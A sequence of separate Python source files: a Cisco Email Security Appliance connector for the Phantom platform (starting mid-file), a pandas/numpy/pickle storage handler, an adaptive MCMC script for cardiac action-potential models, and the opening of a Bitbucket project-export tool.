consts.CISCOESA_MAIL_INCOMING_DOMAIN_DETAILS_REPORT_TITLE: consts.CISCOESA_MAIL_INCOMING_DOMAIN_DETAILS_REPORT_NAME,
consts.CISCOESA_MAIL_INCOMING_IP_HOSTNAME_DETAILS_REPORT_TITLE:
consts.CISCOESA_MAIL_INCOMING_IP_HOSTNAME_DETAILS_REPORT_NAME,
consts.CISCOESA_MAIL_INCOMING_NETWORK_OWNER_DETAILS_REPORT_TITLE:
consts.CISCOESA_MAIL_INCOMING_NETWORK_OWNER_DETAILS_REPORT_NAME,
consts.CISCOESA_OUTGOING_SENDERS_DOMAIN_DETAILS_REPORT_TITLE:
consts.CISCOESA_OUTGOING_SENDERS_DOMAIN_DETAILS_REPORT_NAME,
consts.CISCOESA_MAIL_OUTGOING_SENDERS_IP_HOSTNAME_DETAILS_REPORT_TITLE:
consts.CISCOESA_MAIL_OUTGOING_SENDERS_IP_HOSTNAME_DETAILS_REPORT_NAME,
consts.CISCOESA_OUTGOING_CONTENT_FILTERS_REPORT_TITLE: consts.CISCOESA_OUTGOING_CONTENT_FILTERS_REPORT_NAME,
consts.CISCOESA_OUTGOING_DESTINATIONS_REPORT_TITLE: consts.CISCOESA_OUTGOING_DESTINATIONS_REPORT_NAME,
consts.CISCOESA_VIRUS_TYPES_REPORT_TITLE: consts.CISCOESA_VIRUS_TYPES_REPORT_NAME,
consts.CISCOESA_INBOUND_SMTP_AUTH_REPORT_TITLE: consts.CISCOESA_INBOUND_SMTP_AUTH_REPORT_NAME,
consts.CISCOESA_DLP_OUTGOING_POLICY_REPORT_TITLE: consts.CISCOESA_DLP_OUTGOING_POLICY_REPORT_NAME
}
def _is_ip(ip_address):
""" Function that validates IP address (IPv4 or IPv6).
:param ip_address: IP address to verify
:return: True or False
"""
# Validate IP address
if not phantom.is_ip(ip_address):
try:
socket.inet_pton(socket.AF_INET6, ip_address)
except socket.error:
return False
return True
class CiscoesaConnector(BaseConnector):
""" This is an AppConnector class that inherits the BaseConnector class. It implements various actions supported by
Cisco ESA and helper methods required to run the actions.
"""
def __init__(self):
# Calling the BaseConnector's init function
super(CiscoesaConnector, self).__init__()
self._url = None
self._username = None
self._password = <PASSWORD>
self._verify_server_cert = False
return
def initialize(self):
""" This is an optional function that can be implemented by the AppConnector derived class. Since the
configuration dictionary is already validated by the time this function is called, it's a good place to do any
extra initialization of any internal modules. This function MUST return a value of either phantom.APP_SUCCESS or
phantom.APP_ERROR. If this function returns phantom.APP_ERROR, then AppConnector::handle_action will not get
called.
"""
config = self.get_config()
self._url = config[consts.CISCOESA_CONFIG_URL].strip("/")
self._username = config[consts.CISCOESA_CONFIG_USERNAME]
self._password = config[consts.CISCOESA_CONFIG_PASSWORD]
self._verify_server_cert = config.get(consts.CISCOESA_CONFIG_VERIFY_SSL, False)
# In "get report" action, if "starts_with" parameter is set, validate IP and email
self.set_validator(consts.CISCOESA_CONTAINS_IP, None)
self.set_validator(consts.CISCOESA_CONTAINS_EMAIL, None)
return phantom.APP_SUCCESS
def _parse_report_data(self, report_data, action_result):
""" Function to parse report data by converting its value from object to list format to make output of all
reports consistent.
:param report_data: report data
:param action_result: Object of ActionResult class
:return: status success/failure and (parsed report data or None)
"""
# Parsing values of report data by assigning report_key value to "recipient" key and its count to "count" key
for report_key, report_value in report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA].items():
# List that will contain parsed values of report data that will be assigned to corresponding keys of report
parsed_result = []
# If report value is there, then value will be parsed
if report_value:
try:
for recipient, count in report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA][report_key].items():
parsed_result.append({
consts.CISCOESA_GET_REPORT_PARAM_RECIPIENT: recipient,
consts.CISCOESA_GET_REPORT_PARAM_COUNT: count
})
except Exception as error:
self.debug_print(consts.CISCOESA_GET_REPORT_PARSE_ERROR.format(error))
# set the action_result status to error, the handler function will most probably return as is
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_GET_REPORT_PARSE_ERROR.format(
error
)), None
report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA][report_key] = parsed_result
return phantom.APP_SUCCESS, report_data
def _validate_date_time(self, date_time_value, action_result):
""" Function used to validate date and time format. As per the app configuration, date and time must be provided
in YYYY-MM-DDTHH:00 format.
:param date_time_value: date and time value that needs to be split and validated
:param action_result: Object of ActionResult class
:return: status success/failure and (parsed datetime or None)
"""
date_time = date_time_value.split("T")
# If given datetime not in expected format
if len(date_time) <= 1:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR), None
if len(date_time[1].split(":")) != 2:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR), None
date = date_time[0].split("-")
hour = date_time[1].split(":")[0]
if len(date) != 3:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR), None
try:
parsed_date_time = datetime.datetime(
year=int(date[0]), month=int(date[1]), day=int(date[2]), hour=int(hour)
)
except:
self.debug_print(consts.CISCOESA_DATE_TIME_VALIDATION_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_VALIDATION_ERROR), None
return phantom.APP_SUCCESS, parsed_date_time
def _make_rest_call(self, endpoint, action_result, params=None, method="get", timeout=None):
""" Function that makes the REST call to the device. It is a generic function that can be called from various
action handlers.
:param endpoint: REST endpoint that needs to be appended to the service address
:param action_result: object of ActionResult class
:param params: request parameters if method is get
:param method: get/post/put/delete ( Default method will be "get" )
:param timeout: request timeout in seconds
:return: status success/failure(along with appropriate message), response obtained by making an API call
"""
response_data = None
try:
request_func = getattr(requests, method)
except AttributeError:
self.debug_print(consts.CISCOESA_ERR_API_UNSUPPORTED_METHOD.format(method=method))
# set the action_result status to error, the handler function will most probably return as is
return action_result.set_status(
phantom.APP_ERROR, consts.CISCOESA_ERR_API_UNSUPPORTED_METHOD
), response_data
except Exception as e:
self.debug_print(consts.CISCOESA_EXCEPTION_OCCURRED, e)
# set the action_result status to error, the handler function will most probably return as is
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_EXCEPTION_OCCURRED, e), response_data
auth_string = "{username}:{password}".format(username=self._username, password=self._password)
credentials = base64.b64encode(auth_string.encode('utf-8')).decode()
headers = {
"Accept": "application/json",
"Authorization": "Basic {credentials}".format(credentials=credentials)
}
try:
response = request_func("{base_url}{endpoint}".format(base_url=self._url, endpoint=endpoint),
params=params, headers=headers, timeout=timeout, verify=self._verify_server_cert)
except Exception as e:
self.debug_print(consts.CISCOESA_ERR_SERVER_CONNECTION, e)
# set the action_result status to error, the handler function will most probably return as is
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_ERR_SERVER_CONNECTION, e), response_data
# Try parsing the json
try:
content_type = response.headers.get("content-type")
if content_type and content_type.find("json") != -1:
response_data = response.json()
else:
response_data = response.text
except Exception as e:
# r.text is guaranteed to be NON None, it will be empty, but not None
msg_string = consts.CISCOESA_ERR_JSON_PARSE.format(raw_text=response.text)
self.debug_print(msg_string, e)
# set the action_result status to error, the handler function will most probably return as is
return action_result.set_status(phantom.APP_ERROR, msg_string, e), response_data
if response.status_code in ERROR_RESPONSE_DICT:
message = ERROR_RESPONSE_DICT[response.status_code]
# overriding message if available in response
if isinstance(response_data, dict):
message = response_data.get("error", {}).get("message", message)
self.debug_print(consts.CISCOESA_ERR_FROM_SERVER.format(status=response.status_code, detail=message))
# set the action_result status to error, the handler function will most probably return as is
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_ERR_FROM_SERVER,
status=response.status_code, detail=message), response_data
# In case of success scenario
if response.status_code == consts.CISCOESA_REST_RESP_SUCCESS:
# If response obtained is not in object format
if not isinstance(response_data, dict):
self.debug_print(consts.CISCOESA_UNEXPECTED_RESPONSE.format(report_name=response_data))
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_UNEXPECTED_RESPONSE.format(
report_name=response_data
)), response_data
return phantom.APP_SUCCESS, response_data
# If response code is unknown
message = consts.CISCOESA_REST_RESP_OTHER_ERROR_MSG
if isinstance(response_data, dict):
message = response_data.get("error", {}).get("message", message)
self.debug_print(consts.CISCOESA_ERR_FROM_SERVER.format(status=response.status_code, detail=message))
# All other response codes from REST call
# Set the action_result status to error, the handler function will most probably return as is
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_ERR_FROM_SERVER,
status=response.status_code,
detail=message), response_data
def _decode_url(self, param):
""" Process URL and return it stripped
of the 'secure-web.cisco.com' portion and unquoted
:param param: dictionary of input parameters
:return: status success/failure
"""
self.save_progress("Decoding URL")
action_result = self.add_action_result(ActionResult(dict(param)))
encoded_url = param['encoded_url']
sw_match = re.match(r'^(https?://)?secure-web\.cisco\.com/.+/(?P<quoted>.+)$', encoded_url)
# Parse the URL if it looks like what we are expecting otherwise return the whole URL unquoted.
if sw_match:
message = 'Parsed from secure-web.cisco.com URL and decoded'
if sw_match.group('quoted'):
decode_me = sw_match.group('quoted')
else:
decode_me = encoded_url.split('/')[-1]
else:
message = 'Decoded entire URL'
decode_me = encoded_url
action_result.add_data({'decoded_url': urllib.parse.unquote(decode_me)})
self.save_progress("Decoding URL succeeded")
return action_result.set_status(phantom.APP_SUCCESS, message)
def _get_report(self, param):
""" Function to retrieve statistical report from the Email Security appliance.
:param param: dictionary of input parameters
:return: status success/failure
"""
action_result = self.add_action_result(ActionResult(dict(param)))
result_data = dict()
api_params = dict()
# Getting mandatory parameters
report_title = param[consts.CISCOESA_GET_REPORT_JSON_REPORT_TITLE]
# Getting optional parameters
start_time = param.get(consts.CISCOESA_GET_REPORT_JSON_START_TIME)
end_time = param.get(consts.CISCOESA_GET_REPORT_JSON_END_TIME)
search_value = param.get(consts.CISCOESA_GET_REPORT_JSON_SEARCH_VALUE)
limit = int(param.get(consts.CISCOESA_GET_REPORT_JSON_LIMIT, consts.CISCOESA_DEFAULT_LIMIT))
starts_with = param.get(consts.CISCOESA_GET_REPORT_JSON_STARTS_WITH)
# If both start_time and end_time is not given, then by default, API will query report for last 250 days
if not start_time and not end_time:
start_time = (datetime.datetime.now() - datetime.timedelta(
days=consts.CISCOESA_DEFAULT_SPAN_DAYS
)).strftime(consts.CISCOESA_INPUT_TIME_FORMAT)
end_time = datetime.datetime.now().strftime(consts.CISCOESA_INPUT_TIME_FORMAT)
# If start_time is given, but end_time is not given
elif not end_time:
try:
# end_time will be calculated equivalent to given start_time
end_time = datetime.datetime.strptime(start_time, consts.CISCOESA_INPUT_TIME_FORMAT) + \
datetime.timedelta(days=consts.CISCOESA_DEFAULT_SPAN_DAYS)
# If calculated end_time is a future date, then it will be replaced by current date
if datetime.datetime.strptime(start_time, consts.CISCOESA_INPUT_TIME_FORMAT) + datetime.timedelta(
days=consts.CISCOESA_DEFAULT_SPAN_DAYS) >= datetime.datetime.now():
end_time = datetime.datetime.now()
except:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
# Converting date in string format
end_time = end_time.strftime(consts.CISCOESA_INPUT_TIME_FORMAT)
# If start_time is not given, but end_time is given
elif not start_time:
try:
# start_time will be calculated equivalent to given end_time
temp_time1 = datetime.datetime.strptime(end_time, consts.CISCOESA_INPUT_TIME_FORMAT)
temp_time2 = datetime.timedelta(days=consts.CISCOESA_DEFAULT_SPAN_DAYS)
start_time = ( temp_time1 - temp_time2 ).strftime(consts.CISCOESA_INPUT_TIME_FORMAT)
except:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
# Validating start_time
validate_status, parsed_start_time = self._validate_date_time(start_time, action_result)
# Something went wrong while validating start_time
if phantom.is_fail(validate_status):
return action_result.get_status()
# Validating end_time
validate_status, parsed_end_time = self._validate_date_time(end_time, action_result)
# Something went wrong while validating end_time
if phantom.is_fail(validate_status):
return action_result.get_status()
# Comparing start time and end time
if parsed_start_time >= parsed_end_time:
self.debug_print(consts.CISCOESA_START_TIME_GREATER_THEN_END_TIME)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_START_TIME_GREATER_THEN_END_TIME)
# if starts_with parameter is not set, then IP and email must be validated
if not starts_with and search_value and report_title in \
[consts.CISCOESA_MAIL_INCOMING_IP_HOSTNAME_DETAILS_REPORT_TITLE,
consts.CISCOESA_MAIL_OUTGOING_SENDERS_IP_HOSTNAME_DETAILS_REPORT_TITLE,
consts.CISCOESA_MAIL_USER_DETAILS_REPORT_TITLE]:
# Search value should be validated to be either an IP address or an email, if report title is
# "Incoming Mail: IP Addresses", "Outgoing Senders: IP Addresses" or "Internal Users"
if not _is_ip(search_value) and not phantom.is_email(search_value):
self.debug_print(consts.CISCOESA_SEARCH_VALUE_VALIDATION_FAIL)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_SEARCH_VALUE_VALIDATION_FAIL)
# Report will be queried for last given duration period
# Time zone that will be considered for calculating time and date will be GMT having 00:00 offset from UTC
# Time to query the report supports only 00 minutes
try:
start_time = parsed_start_time.strftime(consts.CISCOESA_API_TIME_FORMAT)
end_time = parsed_end_time.strftime(consts.CISCOESA_API_TIME_FORMAT)
except Exception as error:
self.debug_print(error)
return action_result.set_status(phantom.APP_ERROR, error)
api_params[consts.CISCOESA_GET_REPORT_PARAM_DURATION] = consts.CISCOESA_DURATION_FORMAT.format(
start_time=start_time, end_time=end_time
)
# Obtain report name
report_name = REPORT_TITLE_TO_NAME_AND_FILTER_MAPPING[report_title]
# You cannot use the entity and max=n attributes in the same request.
# If entity is given to filter a report, then limit will not be provided while making REST call
if search_value:
api_params[consts.CISCOESA_GET_REPORT_PARAM_ENTITY] = search_value
api_params.pop(consts.CISCOESA_GET_REPORT_PARAM_MAX, None)
# If entity is given to filter the result and "starts_with" is set, then only "starts_with" parameter will
# be set in api_params
if starts_with:
api_params[consts.CISCOESA_GET_REPORT_JSON_STARTS_WITH] = starts_with
# If limit is given and entity is not provided to filter the report data, then "entity" and "starts_with"
# keys will be removed from api_params object
elif limit or limit == 0:
api_params[consts.CISCOESA_GET_REPORT_PARAM_MAX] = int(limit)
api_params.pop(consts.CISCOESA_GET_REPORT_PARAM_ENTITY, None)
api_params.pop(consts.CISCOESA_GET_REPORT_JSON_STARTS_WITH, None)
report_endpoint = consts.CISCOESA_GET_REPORT_ENDPOINT.format(report_name=report_name)
self.send_progress(consts.CISCOESA_GET_REPORT_INTERMEDIATE_MSG.format(report_title=report_title))
# Making REST call to get report data
response_status, report_data = self._make_rest_call(report_endpoint, action_result, params=api_params)
# Something went wrong while querying a report
if phantom.is_fail(response_status):
self.debug_print(consts.CISCOESA_GET_REPORT_ERROR.format(report_title=report_title))
return action_result.get_status()
# If report is queried by providing an entity to filter results, then its response data needs to be
# formatted in generic format
if search_value and report_data.get(consts.CISCOESA_GET_REPORT_PARAM_DATA, {}):
parsed_dict = dict()
for matching_key in report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA].keys():
for key, value in report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA][matching_key].items():
if key not in parsed_dict:
parsed_dict[key] = dict()
parsed_dict[key][matching_key] = value
report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA] = parsed_dict
# Parsing report data
if report_data.get(consts.CISCOESA_GET_REPORT_PARAM_DATA):
parse_data_status, report_data = self._parse_report_data(report_data, action_result)
if phantom.is_fail(parse_data_status):
return action_result.get_status()
result_data[report_name] = report_data
action_result.add_data(result_data)
return action_result.set_status(phantom.APP_SUCCESS, consts.CISCOESA_REPORTS_QUERIED_SUCCESS_MSG)
def _test_asset_connectivity(self, param):
""" This function tests the connectivity of an asset with given credentials.
:param param: (not used in this method)
:return: status success/failure
"""
action_result = ActionResult()
self.save_progress(consts.CISCOESA_CONNECTION_TEST_MSG)
self.save_progress("Configured URL: {url}".format(url=self._url))
ret_value, response = self._make_rest_call(endpoint=consts.CISCOESA_TEST_CONNECTIVITY_ENDPOINT,
action_result=action_result, timeout=30)
if phantom.is_fail(ret_value):
self.save_progress(action_result.get_message())
self.set_status(phantom.APP_ERROR, consts.CISCOESA_TEST_CONNECTIVITY_FAIL)
return action_result.get_status()
self.set_status_save_progress(phantom.APP_SUCCESS, consts.CISCOESA_TEST_CONNECTIVITY_PASS)
return action_result.get_status()
def handle_action(self, param):
""" This function gets current action identifier and calls member function of its own to handle the action.
:param param: dictionary which contains information about the actions to be executed
:return: status success/failure
"""
# Dictionary mapping each action with its corresponding actions
action_mapping = {
"test_asset_connectivity": self._test_asset_connectivity,
"get_report": self._get_report,
"decode_url": self._decode_url
}
action = self.get_action_identifier()
try:
run_action = action_mapping[action]
except:
raise ValueError("action {action} is not supported".format(action=action))
return run_action(param)
def finalize(self):
""" This function gets called once all the param dictionary elements are looped over and no more handle_action
calls are left to be made. It gives the AppConnector a chance to loop through all the results that were
accumulated by multiple handle_action function calls and create any summary if required. Another usage is
cleanup, disconnect from remote devices etc.
"""
return phantom.APP_SUCCESS
if __name__ == "__main__":
import sys
import pudb
pudb.set_trace()
if len(sys.argv) < 2:
print("No test json specified as input")
sys.exit(0)
with open(sys.argv[1]) as f:
in_json = f.read()
in_json = json.loads(in_json)
print(json.dumps(in_json, indent=4))
connector = CiscoesaConnector()
connector.print_progress_message = True
return_value = connector._handle_action(json.dumps(in_json), None)
print(json.dumps(json.loads(return_value), indent=4))
sys.exit(0)
|
<filename>b2flow/python/tools/handler.py
import json
import pandas as pd
import numpy as np
import datetime
import pickle as pk
class Metadata:
@staticmethod
def encode(data: dict):
return json.dumps(data)
@staticmethod
def decode(data: bytes):
return json.loads(data)
class Handler:
def __init__(self, storage):
self.storage = storage
def write(self, obj, filename, compress: bool = False):
pass
def read(self, name):
pass
def format_value(batch):
values = []
for value in batch:
if value is None:
values.append("")
else:
values.append(str(value).replace('\\', '\\\\'))
return values
def format_bool(batch):
values = []
for value in batch:
if value is None:
values.append("")
else:
if value:
values.append("1")
else:
values.append("0")
return values
def encode(batch, dtype):
if str(dtype) == str(np.dtype("bool")):
values = format_bool(batch)
else:
values = format_value(batch)
return "\n".join(values).encode()
def decode(data, dtype):
batch = data.decode().split("\n")
if str(dtype) == str(np.dtype("bool")):
values = []
for value in batch:
if value == "1":
values.append(True)
elif value == "0":
values.append(False)
else:
values.append(None)
else:
values = batch
return values
class PandasHandler(Handler):
def write(self, df: pd.core.frame.DataFrame, name: str, batch_size=1024000, compress=False):
"""
Persist a Pandas DataFrame in remote storage
@param df: Pandas DataFrame
@param name: Name will be stored
@param batch_size: How many items per batch
@param compress: Compress data with GZIP before save
"""
storage = self.storage.path(name)
storage_data = storage.path("_data")
metadata = {
'columns': df.columns.tolist(),
'dtypes': df.dtypes.apply(lambda x: x.name).to_dict(),
'count': len(df),
'created_at': datetime.datetime.now().isoformat(),
'compress': compress
}
storage.write(Metadata.encode(metadata), "_metadata")
for column, dtype in metadata['dtypes'].items():
values = df[column]
count = 0
for i in range(0, len(df), batch_size):
count += 1
data = encode(values[i:i+batch_size], dtype)
storage_data.path(column).write(data, f"{str(count).zfill(10)}", compress=compress)
def read(self, name: str):
"""
Restore a persisted Pandas DataFrame in memory
@param name: Name of Pandas DataFrame will be restored
@return: pd.core.frame.DataFrame
"""
storage = self.storage.path(name)
storage_data = storage.path("_data")
metadata = Metadata.decode(storage.read("_metadata"))
data = {}
for column, dtype in metadata['dtypes'].items():
data[column] = []
for entry in storage_data.path(column).list():
data[column] += decode(entry.read(), dtype)
data[column] = pd.Series(data[column], dtype=np.dtype(dtype))
return pd.DataFrame(data)
class NumpyHandler(Handler):
def write(self, arr: np.array, name: str, batch_size=1024000, compress=False):
"""
Persist a Numpy Array in remote storage
@param arr: Numpy Array that will be persisted
@param name: Name will be stored
@param batch_size: How many items per batch will be persisted
@param compress: Compress data with GZIP before save
"""
storage = self.storage.path(name)
storage_data = storage.path("_data")
metadata = {
'shape': list(arr.shape),
'dtype': str(arr.dtype),
'count': len(arr),
'created_at': datetime.datetime.now().isoformat(),
'compress': compress
}
storage.write(Metadata.encode(metadata), "_metadata")
count = 0
for i in range(0, metadata["count"], batch_size):
count += 1
batch = arr[i:i+batch_size]
storage_data.write(batch.tobytes(), f"{str(count).zfill(10)}", compress=compress)
def read(self, name: str):
"""
Restore a persisted Numpy Array in memory
@param name: Name of Numpy Array will be restored
@return: numpy.array
"""
storage = self.storage.path(name)
storage_data = storage.path("_data")
metadata = Metadata.decode(storage.read("_metadata"))
dtype = np.dtype(metadata['dtype'])
shape = (-1, ) + tuple(metadata['shape'][1:])
results = []
for entry in storage_data.list():
results.append(np.frombuffer(entry.read(), dtype=dtype).reshape(shape))
return np.concatenate(results)
class PickleHandler(Handler):
def write(self, obj, name: str, compress=False):
"""
Persist a Pickle in remote storage
@param obj: Any Object that will be persisted
@param name: Name will be stored
@param compress: Compress data with GZIP before save
"""
storage = self.storage.path(name)
storage_data = storage.path("_data")
metadata = {
'class': str(type(obj)),
'created_at': datetime.datetime.now().isoformat(),
'compress': compress
}
storage.write(Metadata.encode(metadata), "_metadata")
storage_data.write(pk.dumps(obj, protocol=4), "data.pk", compress=compress)
def read(self, name):
"""
Restore a persisted Pickle in memory
@param name: Name of Pickle will be restored
@return: pickle
"""
storage_data = self.storage.path(name).path("_data")
return pk.loads(storage_data.read("data.pk"))
class Handlers:
def __init__(self, storage):
self.storage = storage
self.pandas = PandasHandler(storage)
self.numpy = NumpyHandler(storage)
self.pickle = PickleHandler(storage) |
import ap_simulator as ap
import mcmc_setup as ms
import numpy as np
import numpy.random as npr
import matplotlib.pyplot as plt
import time
import sys
model = int(sys.argv[1])
protocol = 1
c_seed = 1
noise_sd = 0.25
original_gs, g_parameters = ms.get_original_params(model) # list, list
chain_file, figs_dir = ms.synthetic_nonhierarchical_chain_file_and_figs_dir(model,protocol,c_seed)
with open(chain_file,"w") as outfile:
outfile.write("# Synthetic nonhierarchical MCMC\n")
outfile.write("# Model {}, protocol {}, c_seed {}\n".format(model,protocol,c_seed))
outfile.write("# noise_sd {}\n".format(noise_sd))
python_seed = c_seed+1
npr.seed(python_seed)
def normal_loglikelihood_uniform_priors(test_trace,expt_trace,sigma):
num_pts = len(test_trace)
sum_of_square_diffs = np.sum((test_trace-expt_trace)**2)
return -num_pts*np.log(sigma)-sum_of_square_diffs/(2.*sigma**2)
chain_file, figs_dir = ms.synthetic_nonhierarchical_chain_file_and_figs_dir(model,protocol,c_seed)
start_time = 0.
end_time = 400.
timestep = 0.2
expt_times = np.arange(start_time,end_time+timestep,timestep)
cell = ap.APSimulator()
cell.DefineProtocol(protocol)
cell.DefineModel(model)
expt_trace = cell.GenerateSyntheticExptTrace(original_gs,noise_sd,c_seed)
sigma_cur = 0.25
theta_cur = np.copy(original_gs+[sigma_cur])
mean_estimate = np.copy(theta_cur)
test_trace = cell.SolveForVoltageTraceWithParams(original_gs)
log_target_cur = normal_loglikelihood_uniform_priors(test_trace,expt_trace,sigma_cur)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.grid()
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Membrane voltage (mV)')
ax.plot(expt_times,expt_trace,color='red',label='Synthetic expt')
ax.plot(expt_times,test_trace,color='blue',label='Initial')
ax.legend()
fig.tight_layout()
fig.savefig(figs_dir+'initial_and_expt_traces.png')
plt.close()
print "log_target_cur:", log_target_cur
num_params = len(theta_cur)
first_iteration = np.concatenate((theta_cur,[log_target_cur]))
loga = 0.
initial_proposal_scale = 0.01
cov_estimate = initial_proposal_scale*np.diag(theta_cur**2)
acceptance = 0.
acceptance_target = 0.25
when_to_adapt = 100*num_params
num_total_iterations = 200000
thinning = 5
assert(num_total_iterations%thinning==0)
num_saved_iterations = num_total_iterations/thinning
how_many_updates = 20
when_to_update = num_total_iterations / how_many_updates
fig = plt.figure()
ax = fig.add_subplot(111)
ax.grid()
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Membrane voltage (mV)')
ax.set_title('All (post-burn, thinned) MCMC sample traces')
burn = num_saved_iterations/4
mcmc = np.zeros((num_saved_iterations+1,num_params+1))
mcmc[0,:] = first_iteration
start = time.time()
for it in xrange(1,num_total_iterations+1):
accepted = 0.
theta_star = npr.multivariate_normal(theta_cur,np.exp(loga)*cov_estimate)
if np.all(theta_star>0):
test_trace = cell.SolveForVoltageTraceWithParams(theta_star[:-1])
log_target_star = normal_loglikelihood_uniform_priors(test_trace,expt_trace,theta_star[-1])
alpha = npr.rand()
if ( np.log(alpha) < log_target_star-log_target_cur ):
theta_cur = theta_star
log_target_cur = log_target_star
accepted = 1.
if (it%thinning==0):
mcmc[it/thinning,:] = np.concatenate((theta_cur,[log_target_cur]))
if (it>=burn):
ax.plot(expt_times,test_trace,alpha=0.01)
if (it>when_to_adapt):
s = it - when_to_adapt
gamma_s = 1./(s+1.)**0.6
temp_covariance_bit = np.array([theta_cur-mean_estimate])
cov_estimate = (1-gamma_s) * cov_estimate + gamma_s * temp_covariance_bit.T.dot(temp_covariance_bit)
mean_estimate = (1-gamma_s) * mean_estimate + gamma_s * theta_cur
loga += gamma_s*(accepted-acceptance_target)
acceptance = ((it-1.)*acceptance + accepted)/it
if (it%when_to_update==0):
time_taken_so_far = time.time()-start
estimated_time_left = time_taken_so_far/it*(num_total_iterations-it)
print it/when_to_update, "/", how_many_updates
print "Time taken: {} s = {} min".format(round(time_taken_so_far,1),round(time_taken_so_far/60.,2))
print "acceptance:", acceptance
print "loga:", loga
print "Estimated time remaining: {} s = {} min".format(round(estimated_time_left,1),round(estimated_time_left/60.,2))
time_taken = time.time()-start
print "Time taken: {} s".format(round(time_taken,2))
ax.plot(expt_times,expt_trace,color='red',label='Synthetic expt')
ax.legend()
fig.tight_layout()
fig.savefig(figs_dir+'mcmc_sample_traces.png')
plt.close()
with open(chain_file,"a") as outfile:
np.savetxt(outfile,mcmc)
for i in xrange(num_params):
if (i<num_params-1):
original_value = original_gs[i]
label = g_parameters[i]
elif (i==num_params-1):
original_value = noise_sd
label = r"\sigma"
fig = plt.figure()
ax = fig.add_subplot(111)
ax.grid()
ax.hist(mcmc[burn:,i],normed=True,bins=40,color='blue',edgecolor='blue')
ax.axvline(original_value,color='red',lw=2)
ax.set_ylabel('Probability density')
ax.set_xlabel('$'+label+'$')
fig.tight_layout()
fig.savefig(figs_dir+label.translate(None,r'\\{}')+'_marginal.png') # need double slashes to get rid of the sigma slash for some reason
plt.close()
|
<reponame>clach04/bitbucket-_tools
#!/usr/bin/env python
# -*- coding: us-ascii -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
#
# export Mercurial (and git) projects on bitbucket.org to local disk
# Python 3 or Python 2
# Attempts to dump meta data
# pretty much hard coded to username and password - doesn't attempt to use keys or handle 2fa
import logging
import os
import os.path
import subprocess
import sys
import base64
import json
import sys
try:
# Assume Python 3.x
from urllib.error import URLError, HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen
except ImportError:
# Probably Python2
from urllib import urlencode
from urllib2 import Request, urlopen
from urllib2 import URLError, HTTPError
log = logging.getLogger(__name__)
logging.basicConfig() # TODO include function name/line numbers in log
if os.environ.get('BB_DUMP_DEBUG'):
if os.environ.get('BB_DUMP_DEBUG').lower() == 'info':
log.setLevel(level=logging.INFO)
else:
log.setLevel(level=logging.DEBUG)
log.setLevel(level=logging.INFO)
def safe_mkdir(newdir):
result_dir = os.path.abspath(newdir)
try:
os.makedirs(result_dir)
except OSError as info:
if info.errno == 17 and os.path.isdir(result_dir):
pass
else:
raise
def get_url(url, headers=None):
log.debug('get_url=%r', url)
response = None
try:
if headers:
request = Request(url, headers=headers)
else:
request = Request(url) # may not be needed
response = urlopen(request)
url = response.geturl() # may have changed in case of redirect
code = response.getcode()
result = response.read()
return result
finally:
if response != None:
response.close()
def get_url_json(url, headers=None):
content = get_url(url, headers=headers)
content = content.decode("utf-8") # Pre Python 3.6 hack (Raspberry Pi in 2019 still uses older release)
return json.loads(content)
def get_list(url, headers=None):
x = get_url_json(url, headers=headers)
values = x['values']
next = x.get('next')
log.debug('len(values)=%d', len(values))
while next:
x = get_url_json(next, headers=headers)
next = x.get('next')
values += x['values']
log.debug('len(values)=%d', len(values))
return values
def gen_local_project_dir_name(project_metadata):
if project_metadata['is_private']:
dir_name_list = ['private']
else:
dir_name_list = ['public']
dir_name_list.append(project_metadata['slug'])
dir_name = os.path.join(*dir_name_list)
return dir_name
class EasyBitBucketAPI():
def __init__(self, username, password=<PASSWORD>, project_owner=None):
assert username is not None, 'need a username, set OS variable BB_USERNAME'
project_owner = project_owner or username
self.repo_info = {'username': username, 'secret': password, 'project_owner': project_owner}
if password:
log.warning('password being used, any git repos will contain password in config checkout file!')
encoded_auth = base64.b64encode("{username}:{secret}".format(**self.repo_info).encode()).decode()
self.headers = dict([("Authorization", "Basic {}".format(encoded_auth))])
else:
self.headers = None
def dump_project_list(self):
# dump meta data lists of all projects
url = 'https://api.bitbucket.org/2.0/repositories/{project_owner}'.format(**self.repo_info)
result = get_list(url, headers=self.headers)
return result
def dump_project_metadata(self, project_name):
# dump meta data detail for each project
# project description
# logo
tmp_repo_info = {'project_name': project_name}
tmp_repo_info.update(self.repo_info)
url = 'https://api.bitbucket.org/2.0/repositories/{project_owner}/{project_name}'.format(**tmp_repo_info)
result = get_url_json(url, headers=self.headers)
return result
def dump_project_issues(self, project_slug):
tmp_repo_info = {'project_slug': project_slug}
tmp_repo_info.update(self.repo_info)
